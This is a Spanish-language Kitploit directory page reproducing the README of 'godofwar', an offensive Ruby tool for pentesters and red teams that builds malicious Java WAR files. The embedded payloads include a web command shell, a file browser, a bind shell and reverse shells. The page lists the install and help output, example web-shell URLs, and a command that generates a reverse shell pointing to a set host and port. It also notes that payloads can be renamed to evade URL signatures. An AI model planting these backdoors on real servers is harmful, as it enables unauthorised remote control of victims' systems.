Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
godofwar — GodOfWar - Constructor malicioso de WAR en Java con payloads integrados | Kitploit
Herramientas/GitHubGitHub/kingsabri/godofwar
Generación de PayloadsExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónRed TeamingDesarrollo de Payloads
GitHubkingsabri/godofwar

godofwar

GodOfWar - Constructor malicioso de WAR en Java con payloads integrados

Ver Repositorio
12534hace 7 añosRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

GodOfWar - Constructor de WAR maliciosas en Java

Una herramienta de línea de comandos para generar payloads WAR para pruebas de penetración / equipos rojos, escrita en Ruby.

root@kitploit:~
                              .
                             hhh              
                            hhhhhhh           
                           hhhhhhhh        
                          hhhhhhhh+        
                         hhhhhhhh'           
                        hhhhhhhh.            
                       hhhhhhhhh             
        ..--          hhhhhhhhh             
      -sh/..  +.     hhhhhhhhh:              
      /+/:-/+ss-`   hhhhhhhhhh:               
      /MMM`ss:``.`  hhhhhhhhhh:              
     .MMMMM:        hhhhhhhhhhhhhhhhh:       
     MMMMMMM:        hhhhhhhhhhhhhhhh:      
     MMMMMMMMMMMMM:  hhhhhhhhhhhhhhhh`       
    :NNm:odh/oMMMNs. hhhhhhhhhhhhhhhh`       
   ./:`smdo+oos++-    `++sNMMMMMNmh+         
      .-y-`     ` :.  /   -dmddhhhhh-        
       o/-     `//o/ /M/   `+hhhhhhhh`       
      /o     :yosmy   +y  .`.hhhhhhhho       
      +`     /../.:      `.y::hhhhhs:`       
       `      `+yys`   .sy` /oohhy:          
                `/:s/-``     `.hh`           
               ..`     `       y+            
            .hNNmmNdymmmmds`   :-            
            hs.   ``..    :y-  `             
               -hhmNmddm+   .                
               `NMMMMMMm                     
                ` `oMMy                      
            `.     /Md-      :o  
           MMMMMMMMMMMMMMMMMMM:             
            MMMMMMMMMMMMMMMMMM:              
             MMMMMMMMMMMMMMMMM               
              MMMMMMMMMMMMMMM.               
              `MMMMMMMMMMMMM.                 
                :sNMMMNMdo:                  
                  ``+m:/-                    
                     `                                  
GodOfWar - Constructor de WAR maliciosas en Java.

Características

  • Payloads preexistentes. (prueba -l/--list)
    • cmd_get
    • filebrowser
    • bind_shell
    • reverse_shell
    • reverse_shell_ui
  • Backdoor configurable. (prueba --host/--port)
  • Control sobre el nombre del payload.
    • Para evitar un nombre malicioso después del despliegue y así evadir firmas de URL.

Instalación

root@kitploit:~
$ gem install godofwar

Uso

root@kitploit:~
$ godofwar -h 

Menú de ayuda:
   -p, --payload PAYLOAD            Genera un war a partir de uno de los payloads disponibles.
                                        (revisa -l/--list)
   -H, --host IP_ADDR               Dirección IP local o remota para el payload elegido
                                        (se usa con -p/--payload)
   -P, --port PORT                  Puerto local o remoto para el payload elegido
                                        (se usa con -p/--payload)
   -o, --output [FILE]              Archivo de salida y nombre del despliegue.
                                        (por defecto es el nombre original del payload. revisa '-l/--list')
   -l, --list                       Lista todos los payloads disponibles.
   -h, --help                       Muestra este mensaje de ayuda.

Ejemplo

Listar todos los payloads

root@kitploit:~
$ godofwar -l
├── cmd_get
│   └── Información:
│       ├── Descripción: Ejecución de comandos a través de interfaz web
│       ├── SO:          cualquiera
│       ├── Ajustes:    {"false"=>"¡No se requieren ajustes!"}
│       ├── Uso:        http://host/cmd.jsp?cmd=whoami
│       ├── Referencias:  ["https://github.com/danielmiessler/SecLists/tree/master/Payloads/laudanum-0.8/jsp"]
│       └── Ruta local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/cmd_get
├── filebrowser
│   └── Información:
│       ├── Descripción: Navegador remoto de archivos, subida, descarga, descompresión y ejecución nativa de comandos
│       ├── SO:          cualquiera
│       ├── Ajustes:    {"false"=>"¡No se requieren ajustes!"}
│       ├── Uso:        http://host/filebrowser.jsp
│       ├── Referencias:  ["http://www.vonloesch.de/filebrowser.html"]
│       └── Ruta local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/filebrowser
├── bind_shell
│   └── Información:
│       ├── Descripción: Shell TCP enlazada (bind shell)
│       ├── SO:          cualquiera
│       ├── Ajustes:    {"port"=>4444, "false"=>"¡No se requieren ajustes!"}
│       ├── Uso:        http://host/reverse-shell.jsp
│       ├── Referencias:  ["Metasploit - msfvenom -p java/jsp_shell_bind_tcp"]
│       └── Ruta local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/bind_shell
├── reverse_shell_ui
│   └── Información:
│       ├── Descripción: Shell inversa TCP con un formulario HTML para establecer LHOST y LPORT desde el navegador.
│       ├── SO:          cualquiera
│       ├── Ajustes:    {"host"=>"attacker", "port"=>4444, "false"=>"¡No se requieren ajustes!"}
│       ├── Uso:        http://host/reverse_shell_ui.jsp
│       ├── Referencias:  []
│       └── Ruta local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell_ui
├── reverse_shell
│   └── Información:
│       ├── Descripción: Shell inversa TCP. LHOST y LPORT están hardcodeados
│       ├── SO:          cualquiera
│       ├── Ajustes:    {"host"=>"attacker", "port"=>4444, "false"=>"¡No se requieren ajustes!"}
│       ├── Uso:        http://host/reverse_shell.jsp
│       ├── Referencias:  []
│       └── Ruta local:  /var/lib/gems/2.5.0/gems/godofwar-1.0.1/payloads/reverse_shell

Generar payload con LHOST y LPORT

root@kitploit:~
godofwar -p reverse_shell -H 192.168.100.10 -P 9911 -o puppy

Después del despliegue, puedes acceder a tu shell en (http://host:8080/puppy/puppy.jsp)

Contribuir

  1. Haz un fork ( https://github.com/KINGSABRI/godofwar/fork ).
  2. Crea tu rama de funcionalidad (git checkout -b my-new-feature).
  3. Realiza tus cambios (git commit -am 'Add some feature').
  4. Sube a la rama (git push origin my-new-feature).
  5. Crea un nuevo Pull Request.

Añadir más backdoors

Para contribuir añadiendo más backdoors:

  1. Crea una nueva carpeta dentro del directorio payloads.
  2. Coloca tu archivo jsp dentro del directorio recién creado (con el mismo nombre del directorio).
  3. Actualiza el archivo payloads_info.json con
    1. descripción.
    2. sistema operativo soportado (procura que sea universal).
    3. configuraciones: host y puerto por defecto.
    4. referencias: el origen del payload o créditos de su creador.

Licencia

La gema está disponible como código abierto bajo los términos de la Licencia MIT.

Descargar herramienta